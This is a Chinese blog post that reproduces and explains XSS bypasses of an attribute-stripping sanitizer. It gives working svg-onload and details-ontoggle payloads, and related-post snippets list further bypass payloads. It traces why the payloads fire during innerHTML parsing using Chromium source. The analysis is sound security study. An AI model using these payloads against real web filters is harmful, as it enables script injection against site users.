复现xss绕过一个循环和两个循环

最新推荐文章于 2022-08-17 11:40:10 发布
最新推荐文章于 2022-08-17 11:40:10 发布
阅读量310 收藏 1
点赞数
分类专栏: 前端 文章标签: servlet 网络 前端 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59280309/article/details/126098775
版权

目录

原文:

方法:

两个循环:

原文:

方法一:

浏览器的渲染过程:

触发流程:

方法二:(%20open%20οntοggle=alert(1)>

details标签

有时可行,有时不行。有延迟的话 肯定执行成功,因为此时异步事件已经执行完成,执行点在innerhtml。如果没有延迟,有可能在js删除属性之后,异步事件才执行完成。

 

事件触发流程:

结论

原文:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;

    // 这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root); 
</script>
</html>

方法:

<svg/a/onload=alert(1)>

基础原理:

list = [1, 2, 3, 4, 5, 6]
for i in list:
    if i == 2:
        list.remove(i)
    print(i)
print(list)

与这个结果类似

 

 

两个循环:

原文:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
<script>

    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;
    // let details = root.querySelector("details")
    // root.removeChild(details)
    // 这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        let attrs = [];
        for (let attr of el.attributes) {
            attrs.push(attr.name);
        }
        for (let name of attrs) {
            el.removeAttribute(name);
        }
    }

    document.body.appendChild(root);

</script>

</html>

方法一:<svg><svg/οnlοad=alert(1)>

<svg><svg/onload=alert(1)>

 原理:

看起来平平无奇,但是它可以在过滤代码执行以前,提前执行恶意代码。

为更好地理解这个问题,需要稍微了解一下浏览器的渲染过程

浏览器的渲染过程:

HTML文档也是用DOM树来表示。所以在浏览器的渲染过程中,我们最关注的就是DOM树是如何构建的。

解析一份文档时,先由标记生成器做词法分析,将读入的字符转化为不同类型的Token,然后将Token传递给树构造器处理;接着标识识别器继续接收字符转换为Token,如此循环。实际上对于很多其他语言,词法分析全部完成后才会进行语法分析(树构造器完成的内容),但由于HTML的特殊性,树构造器工作的时候有可能会修改文档的内容,因此这个过程需要循环处理

 

在树构建过程中,遇到不同的Token有不同的处理方式。具体的判断是在HTMLTreeBuilder::ProcessToken(AtomicHTMLToken* token)中进行的。AtomicHTMLToken是代表Token的数据结构,包含了确定Token类型的字段,确定Token名字的字段等等。Token类型共有7种,kStartTag代表开标签,kEndTag代表闭标签,kCharacter代表标签内的文本。所以一个<script>alert(1)</script>会被解析成3个不同种类的Token,分别是kStartTagkCharacterkEndTag。在处理Token的过程中。

在处理Token的时候,还会用到HTMLElementStack,一个栈的结构。当解析器遇到开标签时,会创建相应元素并附加到其父节点,然后将token和元素构成的Item压入该栈。遇到一个闭标签的时候,就会一直弹出栈直到遇到对应元素构成的item为止,这也是一个处理文档异常的办法。比如<div><p>1</div>会被浏览器正确识别成<div><p>1</p></div>正是借助了栈的能力。

而当处理script的闭标签时,除了弹出相应item,还会暂停当前的DOM树构建,进入JS的执行环境。换句话说,在文档中的script标签会阻塞DOM的构造。JS环境里对DOM操作又会导致回流,为DOM树构造造成额外影响。

总的来说,在script标签内的JS执行完毕以后,DOM树才会构建完成,接着才会加载图片,然后发现加载内容出错才会触发error事件

继续用断点调试svg payload为何成功。

在root.innerHTML = data;断下来后,点击单步调试。

 

 神奇的事情发生了,直接弹出了窗口,点击确定以后,调试器才会走到下一行代码。

触发流程:

上文提到了一个叫HTMLElementStack的结构用来帮助构建DOM树,它有多个出栈函数。其中,除了PopAll以外,大部分出栈函数最终会调用到PopCommon函数。这两个函数代码如下:

void HTMLElementStack::PopAll() {
  root_node_ = nullptr;
  head_element_ = nullptr;
  body_element_ = nullptr;
  stack_depth_ = 0;
  while (top_) {
    Node& node = *TopNode();
    auto* element = DynamicTo<Element>(node);
    if (element) {
      element->FinishParsingChildren();
      if (auto* select = DynamicTo<HTMLSelectElement>(node))
        select->SetBlocksFormSubmission(true);
    }
    top_ = top_->ReleaseNext();
  }
}

void HTMLElementStack::PopCommon() {
  DCHECK(!TopStackItem()->HasTagName(html_names::kHTMLTag));
  DCHECK(!TopStackItem()->HasTagName(html_names::kHeadTag) || !head_element_);
  DCHECK(!TopStackItem()->HasTagName(html_names::kBodyTag) || !body_element_);
  Top()->FinishParsingChildren();
  top_ = top_->ReleaseNext();

  stack_depth_--;
}

当我们没有正确闭合标签的时候,如<svg><svg>,就可能调用到PopAll来清理;而正确闭合的标签就可能调用到其他出栈函数并调用到PopCommon。这两个函数有一个共同点,都会调用栈中元素的FinishParsingChildren函数。这个函数用于处理子节点解析完毕以后的工作。因此,我们可以查看svg标签对应的元素类的这个函数。

void SVGSVGElement::FinishParsingChildren() {
  SVGGraphicsElement::FinishParsingChildren();

  // The outermost SVGSVGElement SVGLoad event is fired through
  // LocalDOMWindow::dispatchWindowLoadEvent.
  if (IsOutermostSVGSVGElement())
    return;

  // finishParsingChildren() is called when the close tag is reached for an
  // element (e.g. </svg>) we send SVGLoad events here if we can, otherwise
  // they'll be sent when any required loads finish
  SendSVGLoadEventIfPossible();
}

这里有一个非常明显的判断IsOutermostSVGSVGElement,如果是最外层的svg则直接返回。注释也告诉我们了,最外层svg的load事件由LocalDOMWindow::dispatchWindowLoadEvent触发;而其他svg的load事件则在达到结束标记的时候触发。所以我们跟进SendSVGLoadEventIfPossible进一步查看。

bool SVGElement::SendSVGLoadEventIfPossible() {
  if (!HaveLoadedRequiredResources())
    return false;
  if ((IsStructurallyExternal() || IsA<SVGSVGElement>(*this)) &&
      HasLoadListener(this))
    DispatchEvent(*Event::Create(event_type_names::kLoad));
  return true;
}
先决条件 在于svg不能最外层 onload 必须保证不是最外层

这个函数是继承自父类SVGElement的,可以看到代码中的DispatchEvent(*Event::Create(event_type_names::kLoad));确实触发了load事件,而前面的判断只要满足是svg元素以及对load事件编写了相关代码即可,也就是说在这里执行了我们写的onload=alert(1)的代码。

小结:

套嵌的svg之所以成功,是因为当页面为root.innerHtml赋值的时候浏览器进入DOM树构建过程;在这个过程中会触发非最外层svg标签的load事件,最终成功执行代码。所以,sanitizer执行的时间点在这之后,无法影响我们的payload。

当然这种方法也可以在上个只有一个循环的xss中执行:

 

方法二:<details%20open%20οntοggle=alert(1)>(

details标签

有时可行,有时不行。有延迟的话 肯定执行成功,因为此时异步事件已经执行完成,执行点在innerhtml。如果没有延迟,有可能在js删除属性之后,异步事件才执行完成。

details 异步执行是将相应执行函数放进一个事件队列中,只要事件不停止,在你放入事件之后,你将details标签删除,已经没用了,因为事件会接着执行

此时我们需要将上面原文中的两行注释打开:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
<script>

    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;
    let details = root.querySelector("details")
    root.removeChild(details)
    // 这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        let attrs = [];
        for (let attr of el.attributes) {
            attrs.push(attr.name);
        }
        for (let name of attrs) {
            el.removeAttribute(name);
        }
    }

    document.body.appendChild(root);

</script>

</html>

执行:

 

事件触发流程:

首先触发代码的点是在DispatchPendingEvent函数里

void HTMLDetailsElement::DispatchPendingEvent(
    const AttributeModificationReason reason) {
  if (reason == AttributeModificationReason::kByParser)
    GetDocument().SetToggleDuringParsing(true);
  DispatchEvent(*Event::Create(event_type_names::kToggle));
  if (reason == AttributeModificationReason::kByParser)
    GetDocument().SetToggleDuringParsing(false);
}

而这个函数是在ParseAttribute被调用的

void HTMLDetailsElement::ParseAttribute(
    const AttributeModificationParams& params) {
  if (params.name == html_names::kOpenAttr) {
    bool old_value = is_open_;
    is_open_ = !params.new_value.IsNull();
    if (is_open_ == old_value)
      return;

    // Dispatch toggle event asynchronously.
    pending_event_ = PostCancellableTask(
        *GetDocument().GetTaskRunner(TaskType::kDOMManipulation), FROM_HERE,
        WTF::Bind(&HTMLDetailsElement::DispatchPendingEvent,
                  WrapPersistent(this), params.reason));

    ....

    return;
  }
  HTMLElement::ParseAttribute(params);
}

ParseAttribute正是在解析文档处理标签属性的时候被调用的。注释也写到了,分发toggle事件的操作是异步的。可以看到下面的代码是通过PostCancellableTask来进行回调触发的,并且传递了一个TaskRunner

TaskHandle PostCancellableTask(base::SequencedTaskRunner& task_runner,
                               const base::Location& location,
                               base::OnceClosure task) {
  DCHECK(task_runner.RunsTasksInCurrentSequence());
  scoped_refptr<TaskHandle::Runner> runner =
      base::AdoptRef(new TaskHandle::Runner(std::move(task)));
  task_runner.PostTask(location,
                       WTF::Bind(&TaskHandle::Runner::Run, runner->AsWeakPtr(),
                                 TaskHandle(runner)));
  return TaskHandle(runner);
}

跟进PostCancellableTask的代码则会发现,回调函数(被封装成task)正是通过传递的TaskRunner去派遣执行。

清楚调用流程以后,就可以思考,为什么无法触发这个事件呢?最大的可能性,就是在任务交给TaskRunner以后又被取消了。因为是异步调用,而且PostCancellableTask这个函数名也暗示了这一点。

结论

details标签的toggle事件是异步触发的,并且直接对details标签的移除不会清除原先通过属性设置的异步任务

戲子 鬧京城°ぃ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS注入进阶练习篇(二)DOM型XSS注入深入
好好睡觉
02-19 2909
DOM型XSS,SVG绕过WAF、DOM 破坏
xss(跨站攻击)
m0_74456293的博客
03-20 2666
xss(跨站攻击)
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5791
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
XSS漏洞详解以及绕过方式。
m0_63028223的博客
05-14 1526
下列以dvwa靶场为例: 反射性XSS: LOW级别 <script>alert('test')</script> 最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。 medium级别 可能过滤了js标签,我们使用input标签, <input onblur=alert`1`>当input失去焦点时会触发 <input onclick=alert `123'> 当input获取焦点(点击输入)时触发
XSS漏洞基础
时之海
02-09 311
0x00 简介 跨站脚本简称xss(cross-site scripting),利用方式主要是借助网站本身设计不严谨,导致执行用户提交的恶意js脚本,对网站自身造成危害。 0x01 分类 反射型 只是简单地把用户输入的数据”反射”给浏览器,攻击时需要用户配合点击,也叫”非持久型xss”。 存储型 会把用户输入的数据”存储”在服务器端,也叫”持久性xss”,常见留言板等可以提交展示用户输入内容的功能点。 DOM型 这种类型的XSS并非按照“数据是否保存在服务器端”来划分的,从效果上来说也是反射型XSS单独划分
XSS绕过技术
10-11
总之,XSS攻击的防御是一个复杂的过程,需要网站开发者和安全人员不断地对输入、输出进行严格的编码和验证,以及使用现代的Web框架提供的安全机制来减少XSS漏洞的风险。对于已经发现的XSS漏洞,应通过更新代码或应用...
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
记录几种XSS绕过方式1
08-03
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者...了解并防御这些XSS绕过方法对于网站安全至关重要,开发者应当定期更新和强化过滤规则,同时进行安全审计,确保网站对XSS攻击有足够的防护能力。
第十一节 绕过替换script和on事件的XSS-01
最新发布
09-15
绕过替换script和on事件的XSS攻击是XSS攻击的一种变体,攻击者通过使用特殊的字符串和payload来绕过Web应用的安全机制。 一、XSS漏洞发现 在XSS攻击中,攻击者首先需要发现Web应用中的漏洞,通常通过构造特殊的...
第十二节 XSS 过滤器绕过-01
09-15
本文将讲解 XSS 过滤器绕过技术的四个方面:本地搭建环境、XSS payload 测试、自动化工具测试和关注最新 HTML 等内容。 本地搭建环境 在 Web 程序中找到过滤的函数,然后拷贝到本地环境,搭建完成。通过本地搭建...
XSS进阶小教程
18年3月萌新白帽子
02-25 3996
一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。 1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。 (1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...
【安全】P 4-26 存储型XSS灰盒测试
Z_David_Z的博客
02-21 171
目录0X01 环境搭建0X02 定向XSS挖掘0X03 黑名单审计0X04 绕过过滤,触发XSS 0X01 环境搭建 使用PhpStudy搭建 微社区程序——ROCBOSS 0X02 定向XSS挖掘 XSS漏洞可以存在于个人资料处,文章发表处或者留言评论处等等 发表文章功能的未知被HTML实体化,无法继续XSS 0X03 黑名单审计 私信位置没有被实体化,可以进行XSS,但是被黑名单过滤。 没有过滤details和ontaggle 0X04 绕过过滤,触发XSS 已知程序过滤了javascript,构
Hidden属性的input标签中XSS的触发方法
CC's Blog
03-31 1万+
今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:<input type="hidden" name="returnurl" value="[USER INJECT]" />正常情况下的XSS应当是: http://victim/?value=” onclick=”alert(document.domain) 但是这里由于该input 未在页面中显示,常用
XSS进阶一
giantbranch的专栏
09-04 3320
实验来源:合天网安实验室
XSS的一些绕过手法
qq_30787769的博客
12-09 1602
注:XSS我没有实战研究过所以大多都是靶场用的手法和别人的一些文章,可能实战的时候效果不好 1.绕过简单的xss防护 1.如果双引号被禁用就用单引号。 2.针对黑名单过滤,过滤一般不全,在过滤了img还有input或者div 3.过滤了onclik,onmouseover,可以尝试冷门的事件触发onmouseenter(注意冷门最好) 4.过滤了()可以尝试(),过滤了‘可以尝试反引号,这个是反引...
XSS(跨站攻击)
热门推荐
huangyongkang666的博客
03-20 3万+
XSS漏洞(跨站脚本) 1.XSS 漏洞简介 ​ XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 ​ xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r spr
XSS 跨站脚本漏洞总结(知识点+实例)
叶子的Blog
10-24 2021
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
常用xss绕过学习及poc,2
qq_38122566的博客
01-06 955
常见标签 <scirpt>标签 <scirpt>alert("xss");</script> <img>标签 <img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img sc...
关于谷歌浏览器特性的一些xss payload
春日野穹
01-24 1987
details 标签 details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签 ">'><details/open/οntοggle=confirm(1)> autofocus属性 说明 autofocus 属性规定当页面加载时标签内元素应该自动获得焦点 onfocus 事件在对象获得焦点时发生 结合起来即可达到弹窗效果 在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签 &lt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戲子 鬧京城°ぃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值